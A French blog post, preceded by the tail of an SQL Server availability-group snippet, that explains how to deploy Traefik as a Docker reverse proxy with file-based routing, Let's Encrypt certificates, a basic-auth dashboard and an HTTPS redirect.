Enfin, sur le noeud secondaire, on rejoint le groupe
ALTER AVAILABILITY GROUP [AG1] JOIN WITH (CLUSTER_TYPE = NONE);
ALTER AVAILABILITY GROUP [AG1] GRANT CREATE ANY DATABASE;




Reverse Proxy: Traefik
Julien Mialon — Tue, 02 Mar 2021 18:26:15 GMT
Après plusieurs année passées à utiliser nginx en tant que reverse proxy sur mes serveurs perso, j'ai découvert Traefik. Nginx avait le désavantage d'être assez lourd en terme de configuration lorsque l'on souhaite ajouter un service, récupérer un certificat let's encrypt... Avec Traefik c'est pour le coup bien plus simple, plusieurs solutions de configuration sont disponible mais les deux qui me semblent les plus intéressantes sont via des labels associés à vos containers docker (la configuration du reverse proxy reste au plus proche de chaque déclaration de service) ou avec un petit fichier de configuration yaml (une quinzaine de ligne par service).
J'ai préféré opter pour la configuration avec les fichiers yaml parce que les labels à associer aux containers docker sont assez verbeux et au moins toute ma configuration se retrouve au même endroit. En plus les fichiers de configurations sont surveillés par Traefik et rechargé à chaque changement. Plus besoin de redémarrer le container docker quand on change quelque chose.
Installation
J'ai personnellement fait le choix d'utiliser Traefik à travers son container docker, ce n'est pas une obligation mais comme tous mes services sont déployés sur docker avec compose, c'est plus simple pour moi.
Première chose à faire, créer un réseau local pour docker pour que Traefik puisse avoir accès aux autres containers.
docker network create compose_default

J'ai choisi de nommer ce réseau compose_default, vous pouvez bien évidemment le nommer comme vous le souhaitez.
Ensuite le fichier docker-compose.yml pour le déploiement de Traefik
version: '3.6'

services:
  traefik:
    container_name: traefik
    image: traefik
    volumes:
      - ./config:/etc/traefik/config
      - ./config.yml:/etc/traefik/traefik.yml
      - ./acme.json:/etc/traefik/acme/acme.json
      - "/var/run/docker.sock:/var/run/docker.sock:ro"
    restart: always
    networks:
      - default
    ports:
      - "80:80"
      - "443:443"

networks:
  default:
    external:
      name: compose_default

Rien de bien exotique ici, on récupère l'image nommé traefik sur le docker hub, on lui monte quelques volumes : 
./config : c'est notre dossier qui contiendra nos fichiers de configuration
./config.yml : c'est le fichier de configuration global de Traefik que l'on va voir juste après
./acme.json : c'est le fichier qui servira à stocker les certificats Let's Encrypt
docker.sock : uniquement dans le cas où vous souhaitez vous servir des labels sur les containers docker pour passer la configuration à Traefik
On lui affecte les ports 80 et 443 afin de pouvoir écouter le trafic http et https par défaut, vous pouvez également en déclarer d'autres si besoin. Et surtout on n'oublie pas de le rattacher au réseau créé précédemment afin qu'il puisse y accéder.
Il est nécessaire de remplir le fichier de configuration config.yml pour lui donner quelques informations : 
global:
  checkNewVersion: true
  sendAnonymousUsage: false

entryPoints:
  http:
    address: :80
  https:
    address: :443

certificatesResolvers:
  letsEncrypt:
    acme:
      email: votre@adresse.email
      storage: /etc/traefik/acme/acme.json
      httpChallenge:
        entryPoint: http

api:
  dashboard: true

providers:
  # Enable Docker configuration backend
  docker:
    endpoint: "unix:///var/run/docker.sock"
    exposedByDefault: false
    watch: true
  # Watch changes in config/files/*
  file:
    directory: /etc/traefik/config/files
    watch: true

Les parties importantes ici, la déclarations des entry points (les ports que Traefik va écouter), la configuration de Let's Encrypt pour qu'automatiquement les certificats soient récupérés et renouvelés quand nécessaire. Les providers de configuration, ici on a activé et les labels docker, et les fichier yaml qui se trouveront dans config/files.
Dernier point, le dashboard, ce n'est pas une obligation mais ça vous permet d'avoir une vision rapide des services configuré sur Traefik via un petit site web. 
Configuration
On va d'ailleurs définir le fichier de configuration associé au dashboard (et oui, il faut bien qu'on le route avec Traefik). On créé donc le fichier config/files/dashboard.yml (vous pouvez le nommer comme vous le souhaitez).
http:
  middlewares:
    traefik-dashboard-auth:
      basicAuth:
        users:
          - "admin:$apr1$qQzhGxNq$8emb71Ic/wW2vVLgr07dK/"
  routers:
    traefik-dashboard:
      rule: "Host(`traefik.julienmialon.com`)"
      service: api@internal
      entrypoints: https
      middlewares: 
        - traefik-dashboard-auth
      tls:
        certResolver: letsEncrypt

Comme promis, la configuration est très rapide, on défini un middleware pour avoir une couche d'authentification sur notre dashboard. Les informations de connexion sont généré avec la commande htpasswd -nb admin password. On définit ensuite notre router, nommé traefik-dashboard, on lui donne comme règle de matcher le nom d'hôte traefik.julienmialon.com, d'écouter uniquement sur le port https, d'utiliser le middleware définit juste au-dessus et de récupérer le certification SSL auprès de Let's Encrypt. La ligne service indique au router vers quel service il doit router la requête. Puisque l'on souhaite ici accéder au dashboard, il est nécessaire de lui indiquer un service interne définit par Traefik qui se nomme api@internal. Une fois le fichier enregistré, peut accéder à l'url pour accéder au dashboard après authentification.
Si par curiosité vous allez consulter le fichier acme.json, vous verrez maintenant qu'il contient les information du certificats pour le nom d'hôte que vous avez utilisé.
Ici on a utilisé un service interne à Traefik (repérable avec le @internal), mais si l'on souhaite utiliser un service qui tourne dans un autre container docker, il faut rajouter un petit peu de configuration. On va prendre ici l'exemple du fichier de configuration pour ce blog.
http:
  routers:
    blog:
      rule: "Host(`blog.julienmialon.com`)"
      service: service-blog
      entrypoints: https
      tls:
        certResolver: letsEncrypt
        
  services:
    service-blog:
      loadBalancer:
        servers:
          - url: "http://ghost-blog:4242/"

La définition du router est quasiment la même que pour le dashboard excepté qu'on mentionne le service service-blog définit plus bas dans le fichier. On a définit ici un service de type load balancer, mais avec une seule cible il ne fera qu'envoyer toujours à la même url. Le nom d'hôte de la cible est le nom du container docker associé qu'on a bien entendu relié à notre réseau compose_default et ghost tourne sur le port 4242.
Une fois le fichier enregistré, on peut aller voir sur le dashboard dans la liste des services pour vérifier qu'il apparaît bien.
Et dans la liste des routers, on a bien notre règle pour matcher sur le nom d'hôte que l'on a définit.
HTTPS / Sécurité
Dans les deux configurations, que ce soit pour le dashboard ou pour le blog, on peut voir qu'on a toujours spécifié d'écouter uniquement sur le port https. Ce qui veut dire que si quelqu'un tente d'accéder à notre site depuis une adresse http://, il n'aura aucune réponse. L'intérêt de faire ça et que l'on va pouvoir définir un router global pour le port http qui va rediriger sur la même adresse mais en https://. 
On va donc rajouter un fichier de configuration pour ce router particulier.
http:
  middlewares:
    forcehttps:
      redirectScheme:
        scheme: https
        permanent: true

  routers:
    forcehttps:
      rule: PathPrefix(`/`)
      entrypoints: http
      service: api@internal
      middlewares: 
        - forcehttps

On définit un middleware nommé forcehttps qui va utiliser le composant redirectScheme en lui indiquant de rediriger sur l'adresse en https de manière permanente (le navigateur va mettre en cache cette redirection et évitera un appel inutile la prochaine fois). On définit ensuite le router qui utilise ce middleware, on lui indique de traiter les requêtes sur le port http uniquement et parce qu'au moins une règle est obligatoire on lui indique un prefix de / ce qui matchera toutes les requêtes. On lui indique le service api mais uniquement parce que c'est un paramètre obligatoire, notre requête sera de toute manière interceptée et redirigée par notre middleware avant.
Vous avez maintenant un reverse proxy simple à utiliser auquel vous pouvez rajouter tous les services que vous souhaitez :-)